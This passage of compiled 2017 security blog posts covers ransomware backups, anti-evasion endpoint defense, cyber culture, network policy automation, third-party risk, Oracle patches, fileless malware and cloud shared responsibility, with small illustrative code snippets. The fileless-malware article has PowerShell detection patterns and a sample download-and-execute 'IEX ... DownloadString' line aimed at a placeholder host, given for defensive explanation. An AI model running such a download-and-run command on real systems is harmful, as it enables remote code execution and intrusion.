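(src / "ehr.txt").write_text("patient data")
vault = Path(tempfile.mkdtemp())
back_up(src, vault)
(src / "ehr.txt").write_text("ENCRYPTED")   # ransomware strikes
restore_latest(vault, src)
print((src / "ehr.txt").read_text())  # patient data
```

A real service adds encryption in transit and at rest, offsite replication, and retention policies, but the recovery logic is conceptually this simple.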

When all of these things are working simultaneously, healthcare organizations are well equipped to stop ransomware attacks effectively. Ransomware and other threats are not going away anytime soon and healthcare will continue to be a target for attackers. The hope is that healthcare professionals continue to keep IT security top of mind. 

About the author: Sanjay is a 20-year technology veteran with a passion for cutting-edge technology and a desire to innovate at the intersection of technology trends. He currently leads product management, marketing and strategy for Barracuda’s security business worldwide.

Thinking Outside the Suite: Adding Anti-Evasive Strategies to Endpoint Security Fri, 03 Nov 2017 01:52:29 -0500 Despite ever-increasing investments in information security, endpoints are still the most vulnerable part of an organization’s technology infrastructure. In a 2016 report with Rapid7, IDC estimated that 70% of attacks start at the endpoint. Sophisticated ransomware exploded into a global epidemic this year, and other forms of malware exploits, including mobile malware and malvertising, are also on the rise.


The only logical conclusion is that existing approaches to endpoint security are not working. As a result, security teams are exposed to mounting, multifaceted challenges due to the ineffectiveness of their current anti-malware solutions, large numbers of security incidents requiring costly and intensive response, and added pressure from the board to undergo risky and expensive “rip and replace” endpoint security procedures.


Current endpoint security solutions employ varying approaches. Some restrict the actions that legitimate applications can take on a system, others aim to prevent malicious software from running, and some monitor activity for incident investigations. The challenge for most IT department heads is finding the right balance of solutions that will work for their particular business.


Endpoint Protection Platforms (EPP), usually offered by established endpoint security vendors, promote the benefits of packaging endpoint control, anti-malware, and detection and response in one agent, managed from one console. While EPP suites can be useful and practical, it’s important to understand their limitations. For starters, a “suite” does not always mean the products are integrated — you may end up with one vendor but multiple agents and management consoles. Second, no single vendor offers the best-of-breed or best-for-your-business options for all the component solutions. If you adopt the EPP approach, be aware that you will be making trade-offs of some sort. Finally, it is likely that even after going through the painful process of deploying a full endpoint protection suite, it will still fail to prevent many attacks.


All these solutions, whether installed separately or as a suite, produce alerts. Many work by finding attacks that have already “landed” to some degree. This means your team will be busy (if not overwhelmed) sorting through the alerts for priority threats, investigating incidents, and remediating any intrusions. This can lead to inefficiencies and escalating staffing requirements, which will quickly wipe out any cost savings you hoped would come from installing bundled solutions.


In the end, it is imperative to understand the strengths and weaknesses within each suite and evaluate whether a best-of-breed or “suite-plus” approach offers better protection for your investment — this is often the case. EPP implementation can help companies consolidate vendors in order to reduce administrative overhead and licensing costs. It may also help minimize complexity and reduce the impact on operations, end-users, and business agility. But none of this matters much if the shortcomings of the platform end up introducing unacceptable levels of risk, draining staff resources, or constraining productivity and agility.


For example, it’s important to recognize that accepting the low detection rates of your conventional antivirus solution also means accepting the high likelihood of a breach. That’s because there is one critical factor most platforms don’t adequately address: unknown malware that has been designed specifically to evade existing defenses. Innovative endpoint defense strategies have emerged that allow you to block evasive malware, regardless of whether there is a known signature, behavior pattern, or machine learning model. This is achieved through the creative use of deceptive tricks that control how the malware perceives its environment.

Endpoint defense solutions that can neutralize evasive malware use three primary strategies: creating a hostile environment, preventing injection through deception, and restricting document executable capabilities. All three strategies contain and disarm the malware before it ever unpacks or puts down roots. 

To create a hostile environment, the malicious program is tricked into believing the environment is not safe for execution, resulting in the malware suspending or terminating its execution. To prevent malicious software from hiding in legitimate processes, the malware is deceived into registering that memory space is unavailable, so it never establishes a foothold on the device. To block malicious actions initiated by document files (via macros, PowerShell, and other scripts), the malware is tricked into registering that system resources like shell commands are not accessible.
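The first of those strategies can be illustrated with a toy simulation: plant the artifacts that an environment-aware sample probes for, so that it concludes it is being analyzed and terminates itself. The marker file names are illustrative assumptions, and real anti-evasion products operate at a much lower level than dropping files:

```python
# Simulation of the "hostile environment" deception: make the host look
# like an analysis sandbox so evasive malware refuses to execute.
import tempfile
from pathlib import Path

# Analysis-tool artifacts that environment-aware malware commonly probes for;
# these names are illustrative, not a complete or authoritative list.
DECOY_MARKERS = ["wireshark.exe", "procmon.exe", "vboxservice.exe"]

def plant_decoys(root: Path) -> list:
    """Create empty decoy files so the host *looks* like a sandbox."""
    created = []
    for name in DECOY_MARKERS:
        decoy = root / name
        decoy.touch()
        created.append(decoy)
    return created

def evasive_sample_would_run(root: Path) -> bool:
    """Simulate the malware's own check: abort if analysis tools seem present."""
    return not any((root / name).exists() for name in DECOY_MARKERS)

host = Path(tempfile.mkdtemp())
print(evasive_sample_would_run(host))   # True: nothing planted yet
plant_decoys(host)
print(evasive_sample_would_run(host))   # False: the sample now self-terminates
```

The point of the simulation is the asymmetry: the defender only has to make the environment *appear* hostile, while the malware's own evasion logic does the work of stopping itself.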

These new strategies reduce risk without requiring increased overhead (nothing malicious installed, so nothing to investigate) or replacement of existing solutions. Anti-evasion solutions work alongside installed AV solutions to provide an added layer of protection against sophisticated malware and ransomware. The threat intelligence they produce (identifying previously unknown malware exploits) enhances your overall security program. In addition, because incident responders have fewer alerts and incidents to sort through, they can focus their expertise on high-priority threats and investigating attacks where the intruder has already gained access to the network.

Working smarter is key to managing the growing and ever-shifting challenges and responsibilities faced by security teams. Reducing workload and manual processes while reducing risk is a tough balancing act. Ongoing cyber security talent shortages combined with multiplying threat vectors make effective automated defenses a critical priority. Getting the most value out of your security budget and skilled experts requires neutralizing threats upfront, preventing as many attacks as possible, and developing automated threat management processes. It’s essential to cover gaps and shortcomings, augmenting existing endpoint security by layering on innovative, focused solutions. Given the recent surge of virulent, global malware and ransomware, anti-evasion defenses are a smart place to start.

About the author: Eddy Boritsky is the CEO and Co-Founder of Minerva Labs, an endpoint security and anti-evasion technology solution provider. He is a cyber and information security domain expert. Before founding Minerva, Eddy was a senior cyber security consultant for the defense and financial sectors.

Managing Cyber Security in Today’s Ever-Changing World Thu, 26 Oct 2017 09:30:27 -0500 When it comes to victims of recent cyber-attacks, their misfortune raises a few critical questions:

  • Is anything really safe? 
  • Do the security recommendations of experts actually matter? 
  • Or do we wait for our turn to be victimized, possibly by an attack so enormous that it shuts down the entire data-driven infrastructure at the heart of our lives today?

As the Executive Director of the Information Security Forum (ISF), an organization dedicated to cyber security, my own response is that major disruptive attacks are indeed possible; however, they are not inevitable. A future in which we can enjoy the benefits of cyber technology in relative safety is within our reach.

Nevertheless, unless we recognize and apply the same dynamics which have constructively channeled other disruptive technologies, the rate and severity of cyber attacks could easily grow. 

Technical Advances

It may seem surprising, particularly in light of the tremendous technological achievement represented by the Internet and digital technology generally, that further advances in technology – which are both desirable and inevitable – may be the least important of the forces taming cybercrime. Progress in the fields of encryption and related security measures will inevitably continue. And they will just as inevitably be followed by progress in developing countermeasures. Some of those countermeasures will be the creations of technically savvy individuals – even teenage whiz kids, born in the digital age, to whom every security regimen is simply another challenge to their hacking skills. 

Over time, the contours of cybercriminal enterprise have grown to become specialized, like that of mainstream business, operating out of conventional office spaces, providing a combination of customer support, marketing programs, product development, and other trappings of the traditional business world. Some organizations develop and sell malware to would-be hackers, often including adolescents and those with relatively little computer skill of their own. Others acquire and use those tools to break into corporate networks, harvesting their information for sale or ransoming it back to its owners. Still others wholesale those stolen data files to smaller operators who either resell them or try using them to siphon money from their owners’ accounts.

Artificial intelligence using advanced analytics could offer a significant, if temporary advance in thwarting potential attackers. IBM, for example, is teaching its Watson system the argot of cyber security, which could, at least in principle, help it to recognize and block threats before they cause significant harm. But technological advances tend to be a cat and mouse game, with hackers in close pursuit of security workers. And security workers themselves can be compromised to bring their best tools over to the dark side.

Still, having even modest security technology in place can slow the pace of malicious hacking: the more time-consuming it is to break into a digital device, the less likely an attacker is to try. Yet many Internet-enabled consumer devices, elements of the so-called Internet of Things (IoT), are largely unprotected, exposing them, among other risks, to becoming unwilling robots in a vast network of slave devices engaged in denial-of-service attacks.

That’s not inevitable; it’s a manufacturer’s choice, driven by economics. The fact is that security can be expensive, and these devices were never designed with security in mind. They were created from the outset to provide and process information at the lowest possible cost. But by maintaining an open connection to the individual’s home computer – a device which may, in turn, be connected to an employer’s network – it offers intruders a portal to inflicting damage that goes well beyond the owner’s home thermostat or voice-driven speaker device. Securing them may become an appropriate topic for government regulation.

Cyber Culture

Although no one is feeling nostalgic about it, there was a time, not terribly long ago, when conducting cyber mischief was a personal enterprise, often a lonely teen operating out of their home basement or bedroom. But today, in the eyes of institutions eager to secure sensitive digital files, the solitary teenage hacker is less a problem than a nuisance. 

What has largely taken his place – and the overwhelming majority of hackers are male – are well organized, highly resourced criminal enterprises, many of which are based overseas, with the ability to monetize stolen data on a scale rarely if ever achieved by the bedroom-based hacker. The most persistent of them – and the hardest to defend against – are state-sponsored. But it is among young people that cyber-culture, including its more malevolent forms, is spread and nourished. And they don’t need to be thugs to participate.

Last year alone, the value of cyber theft was estimated to have reached into the hundreds of billions of dollars, and it’s growing. But unlike bank robberies of years past, cyber-theft bypasses the need to confront victims with threats of harm to coerce them to hand over money. In fact, at the end of 2013, the British Bankers Association reported that “traditional” strong-arm bank robberies had dropped by 90 percent since 2003.  

Instead, with just a few keystrokes – often entered from thousands of miles away – the larcenous acts themselves, which produce neither injury nor fear, seem almost harmless. And, at least in the eyes of adolescent perpetrators – eyes which are frequently hidden behind a mantle of anonymity and under the influence of lawless virtual worlds that populate immersive online games – the slope leading from cyber mischief into cyber crime is very gradual and hard to discern. 

Other hackers have different motives: some feel challenged to probe and test the security of an institution’s firewalls; others want to shame, expose, or seek revenge on an acquaintance; and a few posture as highly principled whistleblowers unmasking an organization’s most sensitive secrets. But even the most traditional notions of privacy and secrecy have themselves undergone something of a metamorphosis lately.

Examples are legion:

  • Earlier this year, as I was flying from Chicago to New York, I couldn’t help but overhear the gentleman on the opposite side of the aisle telling his seatmate – a complete stranger – all about his recent prostate surgery. 
  • Attractive and aspiring celebrities regularly leak – actually, a better term for it might be that they release – videos of the most intimate moments they’ve had with recent lovers.
  • Daytime TV shows in which a host gleefully exploits the private family dysfunctions of his guests have become a programming staple.
  • People working for extremely sensitive government organizations self-righteously hand over the nation’s most confidential data files to be posted online, purportedly to serve the public interest.

A Seismic Shift

There’s a common thread running through each of these examples.  It’s that conventional notions of privacy and appropriate information sharing have changed dramatically. It is a shift which is particularly apparent in the way younger people use the Internet in their private lives, which frequently includes the exchange of highly personal information and images. 

However, for their employers, whose electronic files typically contain sensitive personnel, financial and trade information, that behavior is not only a security concern, it is a journey into treacherous legal territory. And it is a journey which knows no jurisdictional lines. Different national cultures exert a powerful influence on their citizens’ online behavior: what are considered harmless pranks and cyber horseplay among young people in Iraq would be seen as hostile cyber attacks in the U.S.

What we find perplexing is not so much a rapid advance in technology as a profound cultural shift – a sea change that needs to be recognized, shaped and ultimately accommodated to support appropriate and lawful use of these powerful cyber tools. That shift has a direct impact on the workplace. While an employee’s online behavior can certainly damage the organization, those acts are rarely deliberate. In fact, the greater risk comes with behaving too trustfully – opening suspicious emails, clicking on links and uploading files which inadvertently create access to the organization’s network. From there, a malicious attack can move in any direction, creating massive damage.

A New Sheriff?

The heady combination of cyber whiz kids, seismic cultural change, anomic virtual realities, sophisticated criminal gangs, state-sponsored attacks and a vigorous, web-enabled marketplace for all sorts of contraband has produced a kind of Wild West on steroids – something like the early days of automobiles, only this time on a global scale with major incidents reported almost daily. 

At the same time, however, even the Wild West brought on by the motor car was eventually tamed, or at least absorbed into the mainstream of commerce and culture. That transformation was achieved through a trifecta of improved technology for both vehicles and infrastructure, more comprehensive laws coupled with better law enforcement, and a gradual shift in driving culture affecting the perceptions and behavior of motorists. 

In the cyber world, much the same dynamic applies. Improvements in technology will continue making private data more secure. A more encompassing regimen of laws and treaties affecting users and suppliers of equipment as well as service providers will help codify the public’s requirements for security. The European Union’s recently adopted General Data Protection Regulation (GDPR), which gives citizens back control of their personal data while unifying regulation within the EU, is an encouraging example. And more imaginative forms of cyber education to strengthen the culture by supporting appropriate uses of the technology – some of which are already underway in elementary and high school classrooms – will help to crystallize public expectations and inform behavior for the next generation of cyber citizens.

About the author: Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include strategy, information technology, cyber security and the emerging security threat landscape across both the corporate and personal environments. Previously, he was senior vice president at Gartner.

Calming the Complexity: Bringing Order to Your Network Fri, 20 Oct 2017 13:34:05 -0500 In thinking about today’s network environments – with multiple vendors and platforms in play, a growing number of devices connecting to the network and the need to manage it all – it’s easy to see why organizations can feel overwhelmed, unsure of the first step to take towards network management and security. But what if there was a way to distill that network complexity into an easily-managed, secure, and continuously compliant environment?

Exponential Growth

Enterprise networks are constantly growing. Between physical networks, cloud networks, hybrid networks, and the fluctuations that mobile devices introduce, the number of connection points that need to be recognized and protected is daunting. Not to mention that in order to keep your organization running at optimal efficiency – and to keep it secure from potential intrusions – you must operate at the pace the business dictates. New applications need to be deployed and ensuring connectivity is an absolute requisite, while old, now overly permissive rules need to be removed and servers decommissioned. It’s a lot, but teams can trudge through it.

But getting through it isn’t all you have to worry about – the potential for human error in a simple network misconfiguration needs to be factored in as well. As any IT manager knows, even slight changes to the network environment – intended or not – can have a knock-on effect across the entire network.

What’s in Your Network?

Adding up all the moving parts that make up the network, the likely risk of introducing error through manual processes and the resulting consequences of such errors puts your network in a persistent state of jeopardy. This can take the form of lack of visibility, increased time for network changes, disrupted business continuity, or an increased attack surface that cybercriminals could find and exploit.

Considering how large enterprise networks are and the number of changes required to keep the business growing, an organization’s security team can face hundreds of change requests each and every week. These changes are too numerous, redundant, and difficult to manage manually; in fact, a single manual rule-change error could inadvertently open new access points into your network zones, exposing them to nefarious individuals. In a large organization, small problems can quickly escalate.

The network has also fundamentally changed. Long gone are the days of sole reliance on the physical data center, as organizations incorporate the public cloud and hybrid networks into their IT infrastructure. Understanding your network topology is substantially more difficult when it is no longer on premises. Hybrid networks are not always visible to the IT and security teams, which complicates maintaining application connectivity and ensuring security.

Network Segmentation & Complexity: A Balancing Act

Network segmentation limits the exposure that an attacker would have in the event that the network is breached. By segmenting the network into zones, any attacker that enters a specific zone would be able to access only that zone – nothing else. By dividing their enterprise networks into different zones, IT managers minimize access privileges, ensuring that only those who are permitted have access to the data, information, and applications they need.

However, by segmenting the network you’re inherently adding more complexity to be managed. The more segments you have, the more opportunity there is for changes to be made in the rules that govern access among these zones.

How can an IT manager turn an intricate, hybrid network into something manageable, secure, and compliant?

The Answer: Automation and Orchestration

As we have seen, the enterprise network changes all the time – so it’s imperative to ensure that you’re making the correct decisions so that changes do not put the company at risk. The easiest way to do this is to set a network security policy, and use that policy as the guide for all changes that are made in the network. Using a policy-based approach, any change within the network infrastructure is confirmed to be secure and compliant. With a centralized policy in place, now you have control.
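The policy-as-guide idea can be sketched in a few lines: every proposed rule change is validated against a central zone-to-zone policy matrix before anyone touches a device. The zones, services, and matrix below are hypothetical examples:

```python
# Policy-based change control: a proposed rule is approved only if the
# central zone-to-zone policy permits that service between those zones.
# Zone names, services, and the matrix itself are hypothetical.
POLICY = {
    ("guest", "internal"):  set(),             # guests reach nothing internal
    ("admin", "internal"):  {"ssh", "https"},
    ("branch", "datacenter"): {"https"},
}

def change_allowed(src_zone: str, dst_zone: str, service: str) -> bool:
    """Would this proposed rule change comply with the security policy?"""
    return service in POLICY.get((src_zone, dst_zone), set())

requests = [("admin", "internal", "ssh"),
            ("guest", "internal", "https")]
for req in requests:
    print(req, "APPROVE" if change_allowed(*req) else "REJECT")
```

Commercial orchestration tools wrap this check in a full workflow (risk analysis, approval routing, automated push to devices), but the core control is exactly this: no change is implemented unless the policy says it may be.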

The next step to managing complexity is removing the risks of manual errors. This is where automation and orchestration built on a policy-based approach is required.

Now you’re able to analyze the network, design network security rules, and develop and automate the rule approval process. This approach streamlines the change process and eradicates unintended errors.

Using the right automation and orchestration tools can add order and visibility to the network, manage policy violations and exceptions, and streamline operations with continuous compliance and risk management.

Together, automation and orchestration of network security policies ensures that you have a process in place that will enable you to make secure, compliant changes across the entire network – without compromising agility, risking network downtime, or investing valuable time on tedious, manual tasks.

Complexity is the reality of today’s enterprise networks. Rather than risk letting one small event cause a big ripple across your entire organization, with an automated and orchestrated approach to network security management, your network can become better-controlled – helping you improve visibility, compliance, and security.

About the author: Reuven Harrison is CTO and Co-Founder of Tufin. He led all development efforts during the company’s initial fast-paced growth period, and is focused on Tufin’s product leadership. Reuven is responsible for the company’s future vision, product innovation and market strategy. Under Reuven’s leadership, Tufin’s products have received numerous technology awards and wide industry recognition.

Copyright 2010 Respective Author at Infosec Island
#NCSAM: Third-Party Risk Management is Everyone’s Business
Tue, 17 Oct 2017 07:20:00 -0500

One of the weekly themes for National Cyber Security Awareness Month is “Cybersecurity in the Workplace is Everyone’s Business.”

And we couldn’t agree more. Cybersecurity is a shared responsibility that extends not just to a company’s employees, but to the vendors, partners and suppliers that make up a company’s ecosystem. The average Fortune 500 company works with as many as 20,000 different vendors, many of which have access to critical data and systems. As these digital ecosystems become larger and increasingly interdependent, exposure to third-party cyber risk has emerged as one of the biggest threats resulting from these close relationships.

Managing third-party risk is only going to get more difficult, but collaboration – the pooling of information, resources and knowledge – represents the industry’s best chance to effectively mitigate this growing threat. The PwC Global State of Information Security Survey 2016 found that 65 percent of organizations are formally collaborating with partners to improve security and reduce risks.

Overall, organizations need to put more emphasis on understanding the cyber risks their third parties pose. What risks does each third party bring to your company? Do they have access to your network? What would the impact be if they were breached? One of the key ways to do this is to engage with your third parties, assess them based on the level of risk they pose, and collaborate with them on a prioritized mitigation strategy.

It’s unlikely that the pressure facing businesses to become more efficient will lessen, which means larger digital ecosystems and more cyber risks to businesses. The only way to protect your organization from suffering a data breach as a result of a third party is to put more emphasis on understanding the cyber risks your third parties pose and working together to mitigate them.

Learn more about NCSAM at:

Help spread the word by joining in the online conversation using the #NCSAM hashtag!

About the author: As Head of Business Development, Scott is responsible for implementing CyberGRX’s go-to-market and growth strategy. Previous to CyberGRX, he led sales & marketing at SecurityScorecard, Lookingglass, iSIGHT Partners and iDefense, now a unit of VeriSign.

Oracle CPU Preview: What to Expect in the October 2017 Critical Patch Update
Tue, 17 Oct 2017 05:12:00 -0500

The recent media attention focused on patching software could get a shot of rocket fuel on Tuesday with the release of the next Oracle Critical Patch Update (CPU). In a pre-release statement, Oracle has revealed that the October CPU is likely to see nearly two dozen fixes to Java SE, the most common language used for web applications. New security fixes for the widely used Oracle Database Server are also expected, along with patches related to hundreds of other Oracle products.

Most of the Java-related flaws can be exploited without needing user credentials, with the highest vulnerability score expected to be 9.6 on a 10.0 scale. The CPU could also include the first patches for the latest version of Java – Java 9 – which was released in September.

Oracle is also expected to bring the advanced encryption capabilities introduced in Java 9 (JCE Unlimited Strength Policy Files) to previous Java versions 8 through 6.

The October CPU comes on the heels of a September out-of-cycle Security Alert from Oracle addressing flaws exploited in the Equifax attack. The Alert followed the announcement of vulnerabilities in the Struts 2 framework by Apache that were deemed too critical to wait for distribution in the quarterly patch update.

IBM also issued an out-of-cycle patch to address flaws in IBM’s Java-related products in the wake of the Equifax breach.

The Equifax attack has put a spotlight on the vital importance of rapidly applying security patches, as well as the continuing struggle of security teams to keep up with the growing number and size of patches. So far in 2017, NIST’s National Vulnerability Database has catalogued 11,525 new software flaws and has tracked more than 95,000 known vulnerabilities.

Oracle will release the final version of the CPU mid-afternoon Pacific Daylight Time on Tuesday, 17 October.   

About the author: James E. Lee is the Executive Vice President and Chief Marketing Officer at Waratek Inc., a pioneer in the next generation of application security solutions.

Surviving Fileless Malware: What You Need to Know about Understanding Threat Diversification
Fri, 13 Oct 2017 11:50:00 -0500

Businesses and organizations that have adopted digitalization have not only become more agile, but they’ve also significantly optimized budgets while boosting competitiveness. Despite these advances in performance, the adoption of these new technologies has also increased the attack surface that cybercriminals can leverage to deploy threats and compromise the overall security posture of organizations.

The traditional threat landscape involved threats designed to either covertly run as independent applications on the victim’s machine, or compromise the integrity of existing applications and alter their behavior. These threats are commonly referred to as file-based malware, and traditional endpoint protection solutions have incorporated technologies designed to scan files written to disk before they execute.

File-based vs. Fileless

Some of the most common attack techniques involve victims either downloading a malicious application whose purpose is to silently run in the background and track the user’s behavior or to exploit a vulnerability in a commonly installed piece of software so that it can covertly download additional components and execute them without the victim’s knowledge.

Traditional threats must make it onto the victim’s disk before executing the malicious code. Signature-based detection exists specifically for this reason, as it can uniquely identify a file that’s known to be malicious and prevent it from being written or executed on the machine. However, new mechanisms such as encryption, obfuscation, and polymorphism have rendered traditional detection technologies obsolete, as cybercriminals can not only manipulate the way the file looks for each individual victim, but also make it difficult for security scanning engines to analyze the code within.

Traditional file-based malware is usually designed to gain unauthorized access to the operating system and its binaries, normally creating or unpacking additional files and dependencies, such as .dll, .sys or .exe files, that have different functions. It can also install itself as a driver or rootkit to take full control of the operating system, provided it can obtain a valid digital certificate to avoid triggering traditional file-based endpoint security technologies. One such piece of file-based malware was the highly advanced Stuxnet, designed to infiltrate a specific target while remaining persistent. It was digitally signed and had various modules that enabled it to covertly spread from one victim to another until it reached its intended target.

Fileless malware is completely different from file-based malware in terms of how the malicious code is executed and how it dodges traditional file-scanning technologies. As the term implies, fileless malware does not involve any file written to disk for it to be executed. The malicious code may be executed directly within the memory of the victim’s computer, meaning that it will not persist after a system reboot. However, cybercriminals have adopted various techniques that combine fileless abilities with persistence. For example, malicious code placed within registry entries and executed each time Windows boots allows for both stealth and persistence.
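As a rough illustration of how this registry-based persistence can be surfaced, the sketch below flags autorun values whose commands look like fileless PowerShell launchers. The value names, command strings, and heuristics are illustrative assumptions, not a production detector (a real scanner would enumerate the Run keys via the Windows registry API):

```python
import re

# Heuristic patterns that often appear in fileless persistence entries.
SUSPICIOUS_PATTERNS = [
    re.compile(p, re.IGNORECASE) for p in (
        r"powershell(\.exe)?\s+.*-enc(odedcommand)?\b",  # base64-encoded payload
        r"-windowstyle\s+hidden",                        # hidden window
        r"iex\s*\(|invoke-expression",                   # in-memory execution
    )
]

def flag_autorun_values(values):
    """values: dict mapping registry value name -> command string.
    Returns the names whose command matches a suspicious pattern."""
    return [name for name, cmd in values.items()
            if any(p.search(cmd) for p in SUSPICIOUS_PATTERNS)]

# Invented sample data shaped like an HKCU ...\CurrentVersion\Run key.
run_key = {
    "OneDrive": r"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "Updater": "powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgA",
}
flagged = flag_autorun_values(run_key)
```

The point of the sketch is that the payload never touches disk as a scannable file; only the command string in the registry betrays it, which is exactly what file-scanning engines miss.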

The use of scripts, shellcode and even encoded binaries is not uncommon for fileless malware leveraging registry entries, as traditional endpoint security mechanisms usually lack the ability to scrutinize scripts. Because traditional endpoint security scanning tools and technologies mostly focus on static file analysis between known and unknown malware samples, fileless attacks can go unnoticed for a very long time.

The main difference between file-based and fileless malware is where and how its components are stored and executed. The latter is becoming increasingly popular as cybercriminals have managed to dodge file-scanning technologies while maintaining persistence and stealth.

Delivery mechanisms

While both types of attacks rely on the same delivery mechanisms, such as infected email attachments or drive-by downloads exploiting vulnerabilities in browsers or commonly used software, fileless malware is usually script-based and can leverage existing legitimate applications to execute commands. For example, PowerShell scripts that are attached to booby-trapped Word documents can automatically be executed by PowerShell – a native Windows tool. The resulting commands could either send detailed information about the victim’s system to the attacker or download an obfuscated payload that the local traditional security solution can’t detect.

Other possible examples involve a malicious URL that, once clicked, redirects the user to websites that exploit a Java vulnerability to execute a PowerShell Script. Because the script itself is just a series of legitimate commands that may download and run a binary directly within memory, traditional file-scanning endpoint security mechanisms will not detect the threat.
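One concrete, inspectable property of this technique: PowerShell’s -EncodedCommand switch takes the script as Base64 over UTF-16LE text, so a captured command line can be decoded back to plaintext for analysis. A minimal sketch (the payload string and URL are invented for illustration):

```python
import base64

def decode_powershell_payload(b64):
    """Recover the plaintext script from a -EncodedCommand argument.
    PowerShell encodes the script as Base64 over UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")

# Round-trip an example payload the way an attacker would encode it.
script = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/p.ps1')"
encoded = base64.b64encode(script.encode("utf-16-le")).decode()
plaintext = decode_powershell_payload(encoded)
```

Decoding the argument is often the first step a responder takes when triaging a suspicious PowerShell invocation, since the encoded form defeats naive keyword matching.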

These elusive threats are usually targeted at specific organizations and companies with the purpose of covert infiltration and data exfiltration.

Next-gen endpoint protection platforms

Next-gen endpoint protection platforms are usually security solutions that combine layered security – which is to say file-based scanning and behavior monitoring – with machine learning technologies and threat detection sandboxing. Some rely on machine learning algorithms alone as a single layer of defense, whereas others use detection technologies that involve several security layers augmented by machine learning. In these cases, the algorithms are focused on detecting advanced and sophisticated threats at pre-execution, during execution, and post-execution.

A common mistake today is to treat machine learning as a standalone security layer capable of detecting any type of threat. Relying on an endpoint protection platform that uses only machine learning will not harden the overall security posture of an organization.

Machine learning algorithms are designed to augment security layers, not replace them. For example, spam filtering can be augmented through the use of machine learning models, and detection of file-based malware can also use machine learning to assess whether unknown files could be malicious.

Signature-less security layers are designed to offer protection, visibility, and control when it comes to preventing, detecting, and blocking any type of threat. Considering these new attack methods, it’s highly recommended that next-gen endpoint security platforms protect against attack tools and techniques that exploit unpatched known vulnerabilities – and of course, unknown vulnerabilities – in applications. 

It’s important to note that traditional signature-based technologies are not dead and should not be discarded. They’re an important security layer, as they’re accurate and quick to validate whether a file is known to be malicious. The merging of signature-based, behavior-based, and machine learning security layers creates a security solution that’s not only able to deal with known malware, but also tackle unknown threats, which boosts the overall security posture of an organization. This comprehensive mix of security technologies is designed to not only increase the overall cost of attack for cybercriminals, but also offer security teams deep insight into what types of threats usually target their organization and how to accurately mitigate them.

About the author: Bogdan Botezatu is living his second childhood at Bitdefender as senior e-threat analyst. When he is not documenting sophisticated strains of malware or writing removal tools, he teaches extreme sports such as surfing the Web without protection or how to rodeo with wild Trojan horses.

Why Cloud Security Is a Shared Responsibility
Fri, 13 Oct 2017 10:57:53 -0500

Security professionals protect on-premises data centers with wisdom gained through years of hard-fought experience. They deploy firewalls, configure networks and enlist infrastructure solutions to protect racks of physical servers and disks.

With all this knowledge, transitioning to the cloud should be easy. Right?

Wrong. Two common misconceptions will derail your move to the cloud:

  1. The cloud provider will take care of security
  2. On-premises security tools work just fine in the cloud

So, if you’re about to join the cloud revolution, start by answering these questions: how are security responsibilities shared between clients and cloud vendors? And why do on-premises security solutions fail in the cloud?

Cloud Models and Shared Security

A cloud model defines the services a provider delivers. It also defines how the provider splits security responsibilities with customers. Sometimes the split is obvious: cloud providers are, of course, tasked with physical security for their facilities. Cloud customers, obviously, control which users can access their apps and services. After that, the picture can get a little murky.

The following three cloud models don’t comprehensively account for every cloud variation, but they help clarify who is responsible for what:

Software-as-a-Service (SaaS): SaaS providers are responsible for the hardware, servers, databases, data, and the application itself. Customers subscribe to the service and end users interact directly with the application(s) provided by the SaaS vendor. Salesforce and Office 365 are two well-known SaaS offerings.

Platform as a Service (PaaS): PaaS vendors offer a turnkey environment for higher-level programming. The vendor manages the hardware, servers, and databases while the PaaS customer writes the code needed to deliver custom applications. Engine Yard and Google App Engine are examples of PaaS solutions.

Infrastructure as a Service (IaaS): An IaaS environment lets customers create and operate an end-to-end virtualized infrastructure. The IaaS vendor manages all physical aspects of the service as well as the virtualization services needed to build solutions. Customers are responsible for everything else - the applications, workloads, or containers deployed in the cloud. Amazon Web Services (AWS) and Microsoft Azure are popular IaaS solutions.
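To make the split concrete, here is a rough sketch of the responsibility matrix implied by the three models above. The layer names are a simplification of this article’s descriptions, not an official AWS or Azure responsibility matrix:

```python
# Who owns each layer under each cloud model, per the descriptions above.
LAYERS = ["physical", "virtualization", "os", "runtime", "application", "data_access"]

RESPONSIBILITY = {
    "SaaS": {"physical": "provider", "virtualization": "provider", "os": "provider",
             "runtime": "provider", "application": "provider", "data_access": "customer"},
    "PaaS": {"physical": "provider", "virtualization": "provider", "os": "provider",
             "runtime": "provider", "application": "customer", "data_access": "customer"},
    "IaaS": {"physical": "provider", "virtualization": "provider", "os": "customer",
             "runtime": "customer", "application": "customer", "data_access": "customer"},
}

def customer_owns(model):
    """Return the layers the customer must secure under a given model."""
    return [layer for layer in LAYERS if RESPONSIBILITY[model][layer] == "customer"]
```

Reading the matrix row by row makes the article’s point visible: moving from SaaS to IaaS steadily widens the slice of the stack the customer must secure.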

The key to understanding shared security lies in understanding who makes the decisions about a specific aspect of the cloud solution. For example, Microsoft calls the shots on Excel development for their Office 365 SaaS solution. Vulnerabilities in Excel are, therefore, Microsoft’s responsibility. In the same spirit, security vulnerabilities in an app you create on a PaaS service are your responsibility - but operating system vulnerabilities are not.

This all seems like common sense - but it means you’ll need to understand your cloud model to understand your security responsibilities. If you’re securing an IaaS solution you’ll need to take a broad perspective. Everything from server configurations to container provenance can impact your security posture - and they are your responsibility.

Security “Lift and Shift”

An IaaS solution can virtually replicate on-premises infrastructure in the cloud. So lifting and shifting your on-premises security to the cloud may seem like the best way to get up and running. But that approach has led many cloud transitions to ruin. Why? The cloud needs different security approaches for three important reasons:

Change Velocity

Hardware limits how fast a traditional data center can change. The cloud eliminates physical constraints and changes how we think about servers and storage. Cloud solutions, for example, scale by instantly and automatically bringing new servers online. But for traditional security tools, this cloud velocity is chaos. Metered usage costs rapidly spin out of control. Configuration and policy management becomes an overwhelming task. Interdependent security processes become brittle and unreliable.

Network Limitations

On-premises data centers take advantage of stable networks to establish boundaries. In the cloud, networks are temporary resources. Virtual entities join and leave instantaneously and across geographical boundaries. Network identifiers (like IP addresses) no longer provide the same stable control points as they once did and encryption makes it harder to observe application behavior from the network. Network-centric security tools leave cloud solutions vulnerable to lateral movement by attackers.

Cloud Complexity

